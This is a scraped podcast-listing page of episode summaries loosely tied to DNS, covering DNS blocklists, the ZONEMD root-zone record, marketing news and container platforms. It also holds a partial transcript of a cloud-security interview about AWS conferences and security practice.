https://youtu.be/pURzvhYQ2FQ
https://open.lbry.com/@NaomiBrockwell:4/DNS-Blocklists:3

These days, trackers infiltrate nearly every webpage. Advertisements demand your attention and monitor your online movements. Your own devices and software send telemetry back to manufacturers and developers, leaking all kinds of information about your activities. DNS blocklists can help you regain control over your network traffic. They can stop your devices from ever connecting to certain data tracking sites, malicious content, or servers that collect telemetry.

In this video, we explain exactly how they work, and how to set them up on your home network using the open source router and firewall software, pfSense.

00:00 Intro
00:53 Understanding DNS Blocklists
02:32 Setting Up DNS Blocklists
13:36 Note for Quad9 Users
14:17 The Looming Threat
15:12 Conclusion

DNS blocklists and the reports they generate are a great way to become more aware of how our data is being collected and our privacy invaded without us realizing.

Special Thanks to John Todd for guiding us through the tutorial process!

More information about Quad9: https://quad9.net/

Brought to you by NBTV team members: Lee Rennie, Sam Ettaro, Cube Boy, Will Sandoval and Naomi Brockwell

To support NBTV, visit https://www.nbtv.media/support (tax-deductible in the US)

NBTV's new eBook out now! Beginner's Introduction To Privacy - https://amzn.to/3WDSfku

Beware of scammers, I will never give you a phone number or reach out to you with investment advice. I do not give investment advice.

Visit the NBTV website: https://nbtv.media

Support the show

TechByter Worldwide (formerly Technology Corner) with Bill Blinn
TechByter Worldwide 2023-07-21: How To Acquire A Better Nameserver. Short Circuits. Twenty Years Ago.

TechByter Worldwide (formerly Technology Corner) with Bill Blinn

Play Episode Listen Later Jul 21, 2023 17:48


When pointing your browser at a website, the browser needs to find the site's IP address, so it calls on a domain name service server. Using a better DNS server can improve the browser's response time, but only by a bit. There are other reasons to use DNS not from your internet service provider. In Short Circuits: Adobe's Firefly (generative fill) function, even in beta, has shown itself to be surprisingly good at some tasks. It can also be used to create an oil-painting effect on a photograph. • After working with Beeper, a universal chat application, I'm ready to talk about its advantages and (because it's still a beta app) some of the areas that need refinement. Twenty Years Ago (only on the website): In 2003, hardware and software for video editing were still expensive, but the future was clear.

PING
Adding ZONEMD protections to the root zone

PING

Play Episode Listen Later Jul 19, 2023 36:10


In this episode of PING, Verisign fellow Duane Wessels presents the ZONEMD resource record, defined in RFC8976. The "MD" in ZONEMD stands for "message digest": this resource record (RR) is a checksum over the state of a zone, including all its records and the zone's "start of authority" (SOA) record, which carries the zone's serial number. This means that if you fetch an entire zone, whether in the DNS or "out of band" from an FTP or web server or however you receive it, and it carries a ZONEMD record, you have a way to check that what you hold in hand is exactly the entire zone as it should be for that serial. ZONEMD gives people who copy zones in order to serve them (locally, or more widely) a basis to trust the state of the zone before publishing it.

Duane talks about the long lifetime of this idea, with roots back in the 1990s, and the road to RFC8976 taken by the co-authors. A ZONEMD record with an un-testable signature will be placed in the root zone of the DNS in September of this year, and will become testable in December to allow time for the community to understand its behaviour.

This podcast is accompanied by a repost of a Verisign blog Duane wrote recently which has just been republished here on the APNIC Blog: Adding ZONEMD protections to the root zone

Read more about DNS, ZONEMD, and other blogs and podcasts by Duane on the APNIC Blog and elsewhere online:

The Root of the DNS revisited (2023, Geoff Huston)
Notes from DNS OARC 38 (2022 APNIC Blog post by Geoff Huston)
Notes from DNS OARC 35 (2021 APNIC Blog post by Geoff Huston)
RFC8976 (2021 RFC; D. Wessels, P. Barber – Verisign; M. Weinberg – Amazon; W. Kumari – Google; & W. Hardaker – USC/ISI)
[Podcast] A look back at notable root zone changes (Duane Wessels on PING discusses 3 significant root zone changes over the last decade)

Interviews by The Smart Chiropractor
The Importance of Taking Consistent Action with Dr. Taylor Premer

Interviews by The Smart Chiropractor

Play Episode Listen Later Jul 17, 2023 31:44


Dr. Taylor Premer grew up in a small town in Nebraska, attending the University of Nebraska-Lincoln to study Nutrition Science and then chiropractic school at Cleveland University-Kansas City. There, he served as club president of the Motion Palpation Institute club and acquired over 800 hours of continuing education experience in manual manipulation, rehabilitative exercise (DNS), kinesiology taping, manual therapy, and musculoskeletal diagnosis. In his free time, Dr. Premer enjoys reading and exploring new ways of treating patients.

#TWIMshow - This Week in Marketing
Ep169 - LLMs for SEO: A Recipe for Disaster?

#TWIMshow - This Week in Marketing

Play Episode Listen Later Jul 17, 2023 21:32


Episode 169 contains the notable Digital Marketing News and Updates from the week of July 10 - 14, 2023.

1. ByteDance's CapCut Plugin Uses AI to Automate Video Creation - ByteDance, the parent company of TikTok, has released a new plugin for ChatGPT that allows users to create videos with AI. The new plugin leverages generative AI to create everything you need for publishing video content on TikTok and other social channels. It only takes a one-sentence prompt to describe the video's theme, topic, or purpose. But for higher-quality results, the more specific and detailed your prompt is, the better.

2. Microsoft Advertising Announces New Features and Updates to Help Advertisers Get More Results - Microsoft Advertising has announced a number of new features and updates in July, including:

Predictive Targeting - Microsoft Advertising introduced Predictive Targeting, an AI-based advertising tool that uses machine learning to automatically identify and target new audiences for increased conversions, which could save advertisers' time and boost campaign efficiency. While it offers flexible application with existing strategies, potential downsides include losing control over target audiences and possibly wasted ad spend or brand damage if incorrect audiences are exposed to ads.

Generative AI And RSA - Microsoft integrated generative AI into creating and editing responsive search ads (RSA), providing AI-generated headlines and descriptions based on the advertiser's final URL. The updated experience reportedly offers neatly categorized, high-quality, and diverse recommendations in 35 detected languages, enabling advertisers to select multiple suggestions in a single click. You can also opt in to auto-generation of assets, which dynamically creates assets when serving ads, enabling greater scalability and relevancy.

RSA IF Functions - IF functions for RSAs could offer sophisticated targeting and ad customization based on device and audience. This would reduce the need for separate campaigns and enable customized messages for specific user devices or audience segments.

Automated multimedia ads within Dynamic Search Ads (DSA) groups will reportedly utilize AI to automatically generate rich, visually engaging ads optimized for performance using your website's content. Combining users' assets with machine learning technology, these ads will be displayed on the right side of the search results page and exclusive, with only one multimedia ad appearing per page per advertiser.

Property Promotion Ads For Vacation Rentals - Microsoft extended its Property Promotion Ads, which are highly visual ads designed to inspire potential travelers, including vacation rentals and hotels. It allows travel advertisers to display more property offerings on Microsoft platforms. Offering a rich, engaging experience with complete control over images and callouts, these ads could drive increased bookings with premium placements and automated management via familiar ad management workflows in the Microsoft Hotel Center, saving advertisers' time.

Enhancements To Universal Event Tracking - Microsoft Advertising has enhanced its Universal Event Tracking (UET) tag dashboard, troubleshooting and monitoring UET events in real time for more efficient testing and quality assurance. Additionally, the UET overview tab now provides an expanded lookback period to review the performance of your tag across various dimensions, such as events, parameters, and event types. Data-driven attribution (DDA) reporting became generally available, using advanced machine learning to calculate the actual contribution of each ad interaction on conversion, differing from the traditional Last Click Attribution (LCA) model. This model comparison report, accessible through Reports > Default Reports > Performance > Conversion Model Compare, should allow for thorough analysis with a wide range of metrics at the 'Keyword' grain.

Deprecation Of Keyword Planner Legacy Features - Microsoft Advertising is deprecating several legacy features in Keyword Planner, including various service operations and the Product Category feature, due to their outdated nature and incompatibility with the system, effective August 21, 2023.

3. YouTube's New Video Title Suggestions: A Must-Try for Creators - YouTube is rolling out a new feature that will suggest video titles for creators based on the video's transcript and description. This new feature is designed to help creators create more effective titles that will attract more viewers. The title suggestions are generated by an AI model that analyzes the video's transcript and description. The model takes into account factors such as the most common words and phrases in the video, as well as the keywords that are likely to be searched for by viewers. The title suggestions are optional, but creators can choose to use them if they want. The suggestions are also updated over time as the AI model learns more about the video.

4. Google Ads Policy Update: Repeated Violations Could Result in Account Suspension - Google Ads is updating its Circumventing Systems policy this month to clarify that the policy prohibits repeated and simultaneous policy violations across any of your accounts, including using two or more accounts to post ads that violate any Google Ads policy. The update also clarifies that the policy applies to both manual and automated violations. This means that if you are caught using automated software to circumvent Google's systems, your account could be suspended. Google takes violations of this policy very seriously and considers them egregious. If they find violations of this policy, they will suspend your Google Ads accounts upon detection and without prior warning, and you will not be allowed to advertise with Google Ads again. To avoid violating the Circumventing Systems policy, it is important to understand what is considered a violation:

Cloaking (showing different content to certain users, including Google, than to other users) that aims at or results in interference with Google's review systems, or hides or attempts to hide non-compliance with Google Ads policies, such as: redirection to non-compliant content; using dynamic DNS to switch page or ad content; manipulating site content or restricting access to so many of your landing pages that it makes it difficult to meaningfully review your ad, site, or account; using click trackers to redirect users to malicious sites.

Whether repeated or simultaneous, policy violations across any of your accounts, including using 2 or more accounts to post ads that violate this or any other Google Ads policy. For example, creating new domains or accounts to post ads that are similar to ads that have been disapproved for this or any other Google Ads policy.

Bypassing enforcement mechanisms and detection by creating variations of ads, domains or content that have been disapproved (for this or any Google Ads policy) or using techniques in text, images, or videos to obfuscate sexually explicit content.

After a previous suspension decision, attempting to use the Google Ads system again by creating new accounts in order to re-enter the system.

Abusing Google Ads product features in order to show policy non-compliant content to users and/or gain additional traffic.

Submitting false information as part of our verification programs.

As an FYI, Google Search (organic results, not paid) also has a circumvention spam policy.

5. Building Trust and Increasing Sales with Google Merchant Center - Google Merchant Center is a free service that allows you to submit your business and product information to Google so that it can be displayed in Google results. This can be a great way to increase visibility for your products and drive traffic to your website. Google has posted a new document in the Google Merchant Center area on how to build trust with your customers. The document goes through your business identity, your transparency, your online reputation, and your professional design.

Google explained that it wants "Google to be a safe and trustworthy place for both our customers and retailers. Customers should feel confident about the offers they are browsing and the businesses they are purchasing from. Sometimes it can take some time before a sufficient level of trust is established and before we consider it safe to display your offers to customers. This assessment is an ongoing process and since we know that customers are likely to do research about your products and business, we may review multiple signals from across the web. The more we know about your business, the better we are able to represent you."

Here is that list of what Google said customers value in building trust with your business:

Business Identity: Provide the official business name that you use across the web and avoid any mismatches in your registered business name and domain name. Include an "about us" page on your website to show your authenticity and tell customers your unique story. Let customers know that they can follow you on social media profiles and link to those pages from your website.

Transparency: Be clear and provide detailed information about your policies including shipping, returns and privacy policies. Be transparent about your business model and how you operate.

Online reputation: Help potential customers understand how to use your products or how other customers have used them. Show reviews and testimonials about your products and business. If you've received any badges or seals of approval from official third-party sources, make sure that you mention these. Clearly communicate how customers can interact with you by making sure they know how to get in touch with you and how your customer support is set up. If you publish a blog post or if your business was mentioned in an article, make sure your customers know about this.

Professional design: Install an SSL certificate so customers know that their sensitive data is retrieved and stored securely without being intercepted by hackers. Your website should be accessible for all customers, easy to navigate, and shouldn't contain any unnecessary redirects or redirects to broken links. Avoid placeholders for text and images; this gives the feeling that the website is unfinished.

So there you have it, your blueprint from Google on how you can get your customers to trust you. :) But how does Google know if your customers trust you? Google put down this list of how you can help Google learn more about your business:

Provide information in the Business information settings in Merchant Center.
Link the relevant third-party platforms to Merchant Center.
Create and verify a Google Business Profile.
Follow our SEO guidelines to improve the visibility of your website on Google and to provide a good customer experience.
Improve your eligibility for seller ratings, by opting into Google Customer Reviews or other third-party review services.
Match your product data in your product feed with your website to ensure customers see the same information, such as prices, across both.

6. Don't Let Your Syndicated Content Hurt Your SEO! - Syndicated content is content that is published on multiple websites. This can be a problem for SEO, as it can lead to duplicate content issues. Google recommends that publishers use the noindex tag on syndicated content to prevent it from being indexed by search engines. The noindex tag is a meta tag that tells search engines not to index a particular page. This can be useful for a variety of reasons, including preventing duplicate content issues, preventing spam, and improving page load times. To use the noindex tag, simply add the following code to the head section of your page: This will tell search engines not to index the page. Google recommends publishers push syndication partners to use noindex to prevent syndicated content from outranking original news sources.

7. Google Explains How Google Discover Works - Google's Martin Splitt answered a question on the July 2023 Office Hours session about what to do after traffic from Google Discover dries up. Martin offers quick insights into what Google Discover focuses on. Google Discover is a personalized feed of articles that match user interests. It is a great way to drive traffic to your website. Google Discover uses a variety of factors to determine which articles to show users, including the user's search history, the websites they have visited, and the topics they have clicked on. This means that the best way to optimize your content for Google Discover is to create high-quality content (while Google shows relevant evergreen content, the system is also looking for fresh content on particular topics that tend to need freshness) that is relevant to your target audience.

According to Martin, "Generally, content that is indexed and meets our content guidelines can be included in Discover. But … Discover traffic is hard to predict and will ebb and flow. The content in Discover is automatically refreshed as new content is published, however Discover is designed to show all types of helpful content from across the web, not just newly published content. A common mistake I see in the SEO industry is focusing too hard on keywords or the semantics of words and not enough on topics. In my experience, focusing on the semantics of words is a waste of time. Focus on topics of interest. Topics are about what's going on in the industry and understanding what are people interested in right now."

Here are some specific tips for optimizing your content for Google Discover:

Use clear and concise titles that accurately reflect the content of your article.
Use relevant keywords throughout your article.
Include a well-written meta description that summarizes the content of your article.
Use high-quality images and videos.
Promote your articles on social media.

8. Your Page is Discovered, but Not Indexed! Here's How to Fix It - Google's John Mueller answered whether removing pages from a large site helps to solve the problem of pages that are discovered by Google but not crawled. The "Discovered - Currently Not Indexed" status in Google Search Console means that Google has found your page, but it has not yet crawled or indexed it. This can happen for a number of reasons, such as technical errors on your site, duplicate content, or low-quality content, although Google's official documentation only lists one reason: "Discovered – currently not indexed: The page was found by Google, but not crawled yet. Typically, Google wanted to crawl the URL but this was expected to overload the site; therefore Google rescheduled the crawl. This is why the last crawl date is empty on the report." If you see the "Discovered - Currently Not Indexed" status for one of your pages, there are a few things you can do to try to fix it:

Check for technical errors on your site.
Make sure your content is unique and high-quality.
Submit your page to Google Search Console.

9. Google's SEO Advice Has Not Changed in 20 Years. Here's What You Need to Know - Google's core SEO advice has not changed in two decades. That's right, the same advice that Google gave in 2002 still applies today. In a recent post, Danny Sullivan, Google's Search Liaison, shared a screenshot of Google's advice from 2002. The advice reads: "Make pages for users, not for search engines." Sullivan went on to say that Google's core SEO advice has not changed because it is still the best way to create high-quality content that people will want to read. So, what does it mean to "make pages for users, not for search engines"? It means that you should focus on creating content that is informative, helpful, and engaging. You should also use keywords throughout your content, but you should not stuff your content with keywords. If you follow Google's core SEO advice, you will be well on your way to ranking well in search results. Here are some additional tips for following Google's core SEO advice:

Write clear and concise titles that accurately reflect the content of your page.
Use relevant keywords throughout your content, but don't overdo it.
Create high-quality images and videos.

10. LLMs for SEO: A Recipe for Disaster? - Large language models (LLMs) are a powerful tool that can be used for a variety of tasks, including generating text, translating languages, and writing different kinds of creative content. However, LLMs can also be used for SEO purposes, and this can lead to disaster if not done correctly. One of the main problems with using LLMs for SEO is that they can generate content that is not relevant to the user's search intent. This can lead to a decrease in organic traffic, as users will be less likely to click on links to pages that are not relevant to their search. Another problem with using LLMs for SEO is that they can generate content that is plagiarized or duplicate. This can lead to a site being penalized by Google, which can result in a decrease in search rankings. If you are considering using LLMs for SEO, it is important to be aware of the risks involved. You should also make sure that you are using a reputable LLM provider that has a good track record of generating high-quality content.

Sources: https://twitter.com/rustybrick/status/1671848255792054272 and https://flower-nutria-41d.notion.site/No-GPT4-can-t-ace-MIT-b27e6796ab5a48368127a98216c76864

DevOps and Docker Talk
Cycle.io LowOps container platform

DevOps and Docker Talk

Play Episode Listen Later Jul 14, 2023 50:00


Bret and Matt welcome Jake Warner back to the show to talk about LowOps. What does LowOps mean? What can Cycle offer us as an alternative to Swarm and Kubernetes?

Jake Warner is the CEO and founder of Cycle.io. And I had him on the show a few years ago when I first heard about Cycle and I wanted to get an update on their platform offering. On this show we generally talk about Docker and Kubernetes but I'm also interested in any container tooling that can help us deploy and manage container-based applications. Cycle's platform is an alternative container orchestrator as a service. In fact, they go beyond what you would provide normally with a container orchestrator and they provide OS updates, networking, the container runtime, and the orchestrator all in a single offering as a way to reduce the complexity that we're typically faced with when we're deploying Kubernetes. While I'm a fan of Docker Swarm due to its simplicity, it still requires you to manage the OS underneath, to configure networking sometimes, and the feature releases have slowed down in recent years. But I still have a soft spot for those solutions that are removing the grunt work of OS and update management and helping smaller teams get more work done. I think Cycle has the potential to do that for a lot of teams that aren't all in on the Kubernetes way, but still value the container abstraction as the way to deploy software to servers.

Live recording of the complete show from May 18, 2023 is on YouTube (Ep. #217). Includes demos.

★Topics★
Cycle.io website
@cycleplatform on YouTube

Support this show and get exclusive benefits on Patreon, YouTube, or bretfisher.com!

★Join my Community★
Get on the waitlist for my next live course on CI automation and gitops deployments
Best coupons for my Docker and Kubernetes courses
Chat with us and fellow students on our Discord Server DevOps Fans
Grab some merch at Bret's Loot Box
Homepage bretfisher.com

Creators & Guests
Bret Fisher - Host
Cristi Cotovan - Editor
Beth Fisher - Producer
Matt Williams - Host
Jake Warner @ Cycle.io - Guest

(00:00) - Intro
(02:25) - Introducing the guests
(03:17) - What is Cycle?
(12:33) - Deploying and staying up to date with Cycle
(14:21) - Cycle's own OS and updates
(17:12) - Core OS vs Cycle
(22:10) - Use multiple providers with Cycle
(22:52) - Run Cycle anywhere with infrastructure abstraction layer
(24:33) - No latency requirement for the nodes
(28:28) - DNS for container-to-container resolution
(29:54) - Migration from one cloud provider to another?
(31:17) - Roll back and telemetry
(32:48) - Full-featured API
(37:12) - Cycle data volumes
(38:35) - Backups
(40:24) - Autoscaling
(43:00) - Getting started
(44:40) - Control plane and self-hosting
(44:58) - Question about moving to Reno
(45:59) - Built from revenue and angels; no VC funding

Local Matters
Bob Bell & Cookeville High School Cyber Security Team

Local Matters

Play Episode Listen Later Jul 11, 2023 34:01


Bob Bell is joined by Cookeville High School's Scott Waites and two members of the cyber security team, Laurae Thaete and Landon Foister. The group talks about how CTE fits into Cookeville High School and TCAT Livingston, how firewalls work and the ways they keep a computer safe, and what DNS poisoning is. Listen to the latest Local Matters Podcast… Presented by Office Mart. Visit them at 215 S Jefferson Ave in Cookeville to see what they can do for your office.

News Talk 94.1

Screaming in the Cloud
Navigating Continuous Change in Cloud Security with Brandon Sherman

Screaming in the Cloud

Play Episode Listen Later Jul 11, 2023 35:01


Brandon Sherman, Cloud Security Engineer at Temporal Technologies Inc., joins Corey on Screaming in the Cloud to discuss his experiences at recent cloud conferences and the ongoing changes in cloud computing. Brandon shares why he enjoyed fwd:cloudsec more than this year's re:Inforce, and how he's seen AWS events evolve over the years. Brandon and Corey also discuss how the cloud has matured and why Brandon feels ongoing change can be expected to be the continuing state of cloud. Brandon also shares insights on how his perspective on Google Cloud has changed, and why he's excited about the future of Temporal.io.About BrandonBrandon is currently a Cloud Security Engineer at Temporal Technologies Inc. One of Temporal's goals is to make our software as reliable as running water, but to stretch the metaphor it must also be *clean* water. He has stared into the abyss and it stared back, then bought it a beer before things got too awkward. When not at work, he can be found playing with his kids, working on his truck, or teaching his kids to work on his truck.Links Referenced: Temporal: https://temporal.io/ Personal website: https://brandonsherman.com TranscriptAnnouncer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.Corey: In the cloud, ideas turn into innovation at virtually limitless speed and scale. To secure innovation in the cloud, you need Runtime Insights to prioritize critical risks and stay ahead of unknown threats. What's Runtime Insights, you ask? Visit sysdig.com/screaming to learn more. That's S-Y-S-D-I-G.com/screaming.My thanks as well to Sysdig for sponsoring this ridiculous podcast.Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. 
I'm joined today by my friend who I am disappointed to say I have not dragged on to this show before. Brandon Sherman is a cloud security engineer over at Temporal. Brandon, thank you for finally giving in.Brandon: Thanks, Corey, for finally pestering me enough to convince me to join. Happy to be here.Corey: So, a few weeks ago as of this recording—I know that time is a flexible construct when it comes to the podcast production process—you gave a talk at fwd:cloudsec, the best cloud security conference named after an email subject line. Yes, I know re:Inforce also qualifies; this one's better. Tell me about what you talked about.Brandon: Yeah, definitely agree on this being the better the two conferences. I gave a talk about how the ground shifts underneath us, kind of touching on how these cloud services that we operate—and I'm mostly experienced in AWS and that's kind of the references that I can give—but these services work as a contract basis, right? We use their APIs and we don't care how they're implemented behind the scenes. At this point, S3 has been rewritten I don't know how many times. I'm sure that other AWS services, especially the longer-lived ones have gone through that same sort of rejuvenation cycle.But as a security practitioner, these implementation details that get created are sort of byproducts of, you know, releasing an API or releasing a managed service can have big implications to how you can either secure that service or respond to actions or activities that happen in that service. And when I say actions and activity, I'm kind of focused on, like, security incidents, breaches, your ability to do incident response from that.Corey: One of the reasons I've always felt that cloud providers have been cagey around how the services work under the hood is not because they don't want to talk about it so much as they don't want to find themselves committed to certain patterns that are not guaranteed as a part of the definition of the service. 
So if, “Yeah, this is how it works under the hood,” and you start making plans and architecting in accordance with that and they rebuild the service out from under you like they do with S3, then very often, those things that you depend upon being true could very easily no longer be true. And there's no announcement around those things.Brandon: No. It's very much Amazon is… you know, they're building a service to meet the needs of their customers. And they're trying to grow these services as the customers grow along with them. And it's absolutely within their right to act that way, to not have to tell us when they make a change because in some contexts, right, Amazon's feature update might be me as a customer a breaking change. And Amazon wants to try and keep that, what they need to tell me, as small as possible, probably not out of malice, but just because there's a lot of people out there using their services and trying to figure out what they've promised to each individual entity through either literal contracts or their API contracts is hard work. And that's not the job I would want.Corey: No. It seems like it's one of those thankless jobs where you don't get praise for basically anything. Instead, all you get to do is deal with the grim reality that people either view as invisible or a problem.Brandon: Yeah. It sort of feels like documentation. Everyone wants more and better documentation, but it's always an auxiliary part of the service creation process. The best documentation always starts out when you write the documentation first and then kind of build backwards from that, but that's rarely how I've seen software get made.Corey: No. I feel like I left them off the hook, on some level, when we say this, but I also believe in being fair. I think there's a lot of things that cloud providers get right and by and large, with any of the large cloud providers, they are going to do a better job of securing the fundamentals than you are yourself. 
I know that that is a controversial statement to some folks who spent way too much time in the data centers, but I stand by it.Brandon: Yeah, I agree. I've had to work in both environments and some of the easiest, best wins in security is just what do I have, so that way I know what I have to protect, what that is there. But even just that asset inventory, that's the sort of thing that back in the days of data centers—and still today; it was data centers all over the place—to do an inventory you might need to go and send an actual human with an actual clipboard or iPad or whatever, to the actual physical location and hope that they read the labels on hundreds of thousands of servers correctly and get their serial numbers and know what you have. And that doesn't even tell you what's running on them, what ports are open, what stuff you have to care about. In AWS, I can run a couple of describe calls or list calls and that forms the backbone of my inventory.There's no server that, you know, got built into a wall or lost behind and some long-forgotten migration. A lot of those basic stuff that really, really helps. Not to mention then the user-managed service like S3, you never have to care about patch notes or what an update might do. Plenty of times I've, like, hesitated upgrading a software package because I didn't know what was going to happen. Control Tower, I guess, is kind of an exception to that where you do have to care about the version of your cloud service, but stuff like, yeah, these other services is absolutely right. The undifferentiated heavy lifting it's taken care of. And hopefully, we always kind of hope that the undifferentiated heavy lifting doesn't become differentiated and heavy and lands on us.Corey: So, now that we've done the obligatory be nice to cloud providers thing, let's potentially be a little bit harsher. 
While you were speaking at fwd:cloudsec, did you take advantage of the fact that you were in town to also attend re:Inforce?Brandon: I did because I was given a ticket, and I wanted to go see some people who didn't have tickets to fwd:cloudsec. Yeah, we've been nice to cloud providers, but as—I haven't found I've learned a lot from the re:Inforce sessions. They're all recorded anyway. There's not even an open call for papers, right, for talking about at a re:Inforce session, “Hey, like, this would be important and fresh or things that I would be wanting to share.” And that's not the sort of thing that Amazon does with their conferences.And that's something that I think would be really interesting to change if there was a more community-minded track that let people submit, not just handpicked—although I suppose any kind of Amazon selection committee is going to be involved, but to pick out, from the community, stories or projects that are interesting that can be, not just have to get filtered through your TAM but something you can actually talk to and say, “Hey, this is something I'd like to talk about. Maybe other people would find it useful.”Corey: One of the things that I found super weird about re:Inforce this year has been that, in a normal year, it would have been a lot more notable, I think. I know for a fact that if I had missed re:Invent, for example, I would have had to be living in a cave not to see all of the various things coming out of that conference on social media, in my email, in all the filters I put out there. But unless you're looking for it, you've would not know that they had a conference that costs almost as much.Brandon: Yeah. The re:Invent-driven development cycle is absolutely a real thing. You can always tell in the lead up to re:Invent when there's releases that get pushed out beforehand and you think, “Oh, that's cool. 
I wonder why this doesn't get a spot at re:Invent, right, some kind of announcement or whatever.” And I was looking for that this year for re:Inforce and didn't see any kind of announcement or that kind of pre-release trickle of things that are like, oh, there's a bunch of really cool stuff. And that's not to say that cool stuff didn't happen; it just there was a very different marketing feel to it. Hard to say, it's just the vibes around felt different [laugh].Corey: Would you recommend that people attend next year—well let me back up. I've heard that they had not even announced a date for next year. Do you think there will be a re:Inforce next year?Brandon: Making me guess, predict the future, something that I'm—Corey: Yeah, do a prediction. Why not?Brandon: [laugh]. Let's engage in some idle speculation, right? I think that not announcing it was kind of a clue that there's a decent chance it won't happen because in prior years, it had been pre-announced at the—I think it was either at closing or opening ceremonies. Or at some point. There's always the, “Here's what you can look forward to next year.”And that didn't happen, so I think that's there's a decent chance this may have been the last re:Inforce, especially once all the data is crunched and people look at the numbers. It might just be… I don't know, I'm not a marketing-savvy kind of person, but it might just be that a day at re:Invent next year is dedicated to security. But then again, security is always job zero at Amazon so maybe re:Invent just becomes re:Inforce all the time, right? Do security, everybody.Corey: It just feels like a different type of conference. Whenever re:Invent there's something for everyone. At re:Inforce, there's something for everyone as long as they work in InfoSec. 
Because other than that, you wind up just having these really unfortunate spiels of them speaking to people that are not actually present, and it winds up missing the entire forest for the trees, really.Brandon: I don't know if I'd characterize it as that. I feel like some of the re:Inforce content was people who were maybe curious about the cloud or making progress in their companies and moving to the cloud—and in Amazon's case when they say the cloud, they mean themselves. They don't mean any other cloud. And re:Inforce tries to dispel the notion there are any other clouds.But at the same time, it feels like an attempt to try and make people feel better. There's a change underway in the industry and it still is going to continue for a while. There's still all kinds of non-cloud environments people are going to operate for probably until the end of time. But at the same time, a lot of these are moving to the cloud and they want the people who are thinking about this or engaged in it, to be comforted by that Amazon that either has these services, or there's a pattern you can follow to do something in a secure manner. I think that's that was kind of the primary audience of re:Inforce was people who were charged with doing cloud security or were exploring moving their corporate systems to AWS and they wanted some assurance that they're going to actually be doing things the right way, or someone else hadn't made those mistakes first. And if that audience has been sort of saturated, then maybe there isn't a need for that style of conference anymore.Corey: It feels like it's not intended to be the same thing at re:Invent, which is probably I guess, a bigger problem. Re:Invent for a long time has attempted to be all things to all people, and it has grown to a scale where that is no longer possible. So, they've also done a poor job of signaling that, so you wind up attending Adam Selipsky's keynote, and in many cases, find yourself bored absolutely to tears. 
Or you go in expecting it to be an Andy Jassy style of, “Here are 200 releases, four of them good,” and instead, you wind up just having what feels like a relatively paltry number doled out over a period of days. And I don't know that their wrong to do it; I just think it doesn't align with pre-existing expectations. I also think people expecting to go to re:Inforce to see a whole bunch of feature releases are bound to be disappointed.Brandon: Like, both of those are absolutely correct. The number of releases on the slide must always increase up and the right; away we go; we're pushing more code and making more changes to services. I mean, if you look at the history, there's always new instance types. Do they count each instance type as a new release, or they not do that?Corey: Yeah, it honestly feels like that sometimes. They also love to do price cuts where they—you wind up digging into them and something like 90% of them are services you've never heard of in regions you couldn't find on a map if your life depended on it. It's not quite the, “Yeah, the bill gets lower all the time,” that they'd love to present it as being.Brandon: Yeah. And you may even find that there's services that had updates that you didn't know about until you go and check the final bill, the Cost and Usage Report, and you look and go, “Oh, hey. Look at all the services that we were using, that our engineers started using after they heard announcements at re:Invent.” And then you find out how much you're actually paying for them. [pause]. Or that they were in use in the first place. There's no better way to find what is actually happening in your environment than, look at the bill.Corey: It's depressing that that's true. At least they finally stopped doing the slides where they talk about year-over-year, they have a histogram of number of feature and service releases. 
It's, no one feels good about that, even the people building the services and features because they look at that and think, “Oh, whatever I do is going to get lost in the noise.” And they're not wrong. Customers see it and freak out because how am I ever going to keep current with all this stuff? I take a week off and I spend a month getting caught back up again.Brandon: Yeah. And are you going to—you know, what's your strategy for dealing with all these new releases and features? Do you want to have a strategy of saying, “No, you can't touch any of those until we've vetted and understand them?” I mean, you don't even have to talk about security in that context; just the cost alone, understanding it's someone, someone going to run an experiment that bankrupts your company by forgetting about it or by growing into some monster in the bill. Which I suspect helps [laugh] helps you out when those sorts of things happen, right, for companies don't have that strategy.But at the same time, all these things are getting released. There's not really a good way of understanding which of these do I need to care about. Which of these is going to really impact my operational flow, my security impacts? What does this mean to me as a user of the service when there's, I don't know, an uncountable number really, or at least a number that's so big, it stops mattering that it got any bigger?Corey: One thing that I will say was great about re:Invent, I want to say 2021, was how small it felt. It felt like really a harkening back to the old re:Invents. And then you know, 2022 hit, and we go there and half of us wound up getting Covid because of course we did. But it was also this just this massive rush of, we're talking with basically the population of a midsize city just showing up inside of this entire enormous conference. 
And you couldn't see the people you wanted to see, it was difficult to pay attention to all there was to pay attention to, and it really feels like we've lost something somewhere.Brandon: Yeah, but at the same time is that just because there are more people in this ecosystem now? You know, 2021 may have been a callback to that a decade ago. And these things were smaller when it was still niche, but growing in kind of the whole ecosystem. And parts of—let's say, the ecosystem there, I'm talking about like, how—when I say that ecosystem there, I'm kind of talking about how in general, I want to run something in technology, right? I need a server, I need an object store, I need compute, whatever it is that you need, there is more attractive services that Amazon offers to all kinds of customers now.So, is that just because, right, we've been in this for a while and we've seen the cloud grow up and like, oh, wow, you're now in your awkward teenage phase of cloud computing [laugh]? Have we not yet—you know, we're watching the maturity to adulthood, as these things go? I really don't know. But it definitely feels a little, uh… feels a little like we've watched this cloud thing grow from a half dozen services to now, a dozen-thousand services all operating different ways.Corey: Part of me really thinks that we could have done things differently, had we known, once upon a time, what the future was going to hold. So, much of the pain I see in Cloud is functionally people trying to shove things into the cloud that weren't designed with Cloud principles in mind. Yeah, if I was going to build a lot of this stuff from scratch myself, then yeah, I would have absolutely made a whole universe of different choices. But I can't predict the future. And yet, here we are.Brandon: Yep. If I could predict the future, I would have definitely won the lottery a lot more times, avoided doing that one thing I regretted that once back in my history [laugh]. 
Like, knowing the future change a lot of things. But at least unless you're not letting on with something, then that's something that no one's got the ability to, do not even at Amazon.Corey: So, one of the problems I've always had when I come back from a conference, especially re:Invent, it takes me a few… well, I'll be charitable and say days, but it's more like weeks, to get back into the flow of my day-to-day work life. Was there any of that with you and re:Inforce? I mean, what is your day job these days anyway? What are you up to?Brandon: What is my day job? There's a lot. So, Temporal is a small, but quickly growing company. A lot of really cool customers that are doing really cool things with our technology and we need to build a lot of basics, essentially, making sure that when we grow, that we're going to kind of grow into our security posture. There's not anything talking about predicting the future. My prediction is that the company I work for is going to do well. You can hold your analysis on that [laugh].So, while I'm predicting what the company that I'm working at is going to do well, part of it is also what are the things that I'm going to regret not having in two or three years' time. So, some baseline cloud monitoring, right? I want that asset inventory across all of our accounts; I want to know what's going on there. There's other things that are sort of security adjacent. 
